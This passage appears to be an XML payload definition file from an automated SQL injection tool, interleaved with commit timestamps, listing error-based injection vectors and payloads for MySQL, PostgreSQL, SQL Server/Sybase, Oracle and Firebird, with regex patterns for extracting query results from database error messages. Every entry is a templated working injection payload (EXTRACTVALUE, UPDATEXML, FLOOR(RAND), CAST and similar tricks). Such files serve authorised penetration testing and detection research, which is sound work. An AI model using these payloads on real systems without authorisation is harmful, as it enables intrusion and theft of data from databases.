<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2016-06-01 14:23:41 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
2016-06-01 15:12:22 +03:00
<vector > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-20 21:34:47 +03:00
<!-- These work as good as ELT(), but are longer
2016-06-01 15:12:22 +03:00
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
2015-02-20 21:34:47 +03:00
-->
2016-06-01 15:12:22 +03:00
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
<title > PostgreSQL error-based - Parameter replace</title>
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 2</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 3</where>
<vector > (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-20 21:34:47 +03:00
<test >
<title > PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-20 21:34:47 +03:00
<where > 3</where>
<vector > (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > Microsoft SQL Server/Sybase error-based - Parameter replace</title>
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,3</clause>
<where > 3</where>
<vector > (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
<request >
<payload > (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
<stype > 2</stype>
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request >
<payload > (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle error-based - Parameter replace</title>
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Firebird error-based - Parameter replace</title>
<stype > 2</stype>
<level > 4</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
<request >
<payload > (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<!-- End of error - based tests - Parameter replace -->
2015-02-20 21:34:47 +03:00
<!-- Error - based tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.5 error-based - ORDER BY, GROUP BY clause (EXP)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.5</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 5</level>
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.7.8</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-08-28 11:52:36 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
2015-08-28 11:52:36 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 3</level>
2015-08-28 11:52:36 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2016-10-05 00:48:09 +03:00
<vector > ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
2015-08-28 11:52:36 +03:00
<request >
2016-10-05 00:48:09 +03:00
<payload > ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
2015-08-28 11:52:36 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.0</dbms_version>
2015-08-28 11:52:36 +03:00
</details>
</test>
2016-06-01 14:23:41 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
2016-06-01 14:23:41 +03:00
<stype > 2</stype>
2016-06-01 15:12:22 +03:00
<level > 4</level>
2016-06-01 14:23:41 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2016-06-01 14:23:41 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
2016-06-01 14:23:41 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2016-06-01 14:23:41 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 5</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 15:12:22 +03:00
<vector > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-01 15:12:22 +03:00
<payload > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
2016-06-01 15:12:22 +03:00
<dbms_version > > = 5.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-06-01 15:12:22 +03:00
<title > MySQL > = 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
2015-02-20 21:34:47 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2016-06-01 14:23:41 +03:00
<vector > ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</vector>
2015-02-20 21:34:47 +03:00
<request >
2016-06-01 14:23:41 +03:00
<payload > ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</payload>
2015-02-20 21:34:47 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
<level > 3</level>
2015-02-20 21:34:47 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-20 21:34:47 +03:00
<test >
<title > PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request >
<payload > ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 4</level>
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 3</clause>
<where > 1</where>
2016-06-03 14:16:00 +03:00
<vector > ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-03 14:16:00 +03:00
<payload > ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2015-02-20 21:34:47 +03:00
<title > Oracle error-based - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 2</stype>
2015-02-20 21:34:47 +03:00
<level > 4</level>
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request >
<payload > ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-02-20 21:34:47 +03:00
<test >
<title > Firebird error-based - ORDER BY clause</title>
<stype > 2</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
<request >
<payload > ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<!--
TODO: if possible, add payload for SQLite, Microsoft Access
and SAP MaxDB - no known techniques at this time
-->
2015-02-20 21:34:47 +03:00
<!-- End of error - based tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
</root>